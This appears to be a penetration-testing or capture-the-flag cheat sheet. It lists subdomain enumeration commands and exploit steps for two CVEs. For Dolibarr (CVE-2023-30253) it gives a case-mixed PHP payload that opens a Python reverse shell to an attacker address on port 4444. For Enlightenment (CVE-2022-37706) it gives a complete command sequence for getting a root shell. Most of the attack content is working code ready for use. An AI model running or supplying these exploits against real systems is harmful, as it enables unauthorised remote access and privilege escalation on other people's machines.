enum

• gobuster

gobuster -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt vhost -u http://

• wfuzz

wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u “http:///” -H “Host: FUZZ.”

• fuff

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http:/// -H “Host: FUZZ.” -fl 10

CVE-2023-30253

Dolibarr is a web-based suite of features for managing all aspects of your business, from CRM and sales to accounting and manufacturing. It is customisable, extensible, and available on various platforms, as a local or cloud application.

• This vulnerability is on input validation, where the php keyword filtering can be bypassed using mixed case letters, e.g PHP, PhP
• Common config file path: conf/conf.php
• To exploit this vulnerability, one needs to check that the current user has read/write permission to website/content at http://site/user/perms.php
• Then create a website and page at http://site/website/index.php
• Create a website and a page, Enable shown dynamis content
• Example payload for reverse shell:

<section id="mysection1" contenteditable="true">
<?PHP
echo system('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
?>
</section>

CVE-2022-37706

enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.

• https://www.exploit-db.com/exploits/51180
• https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net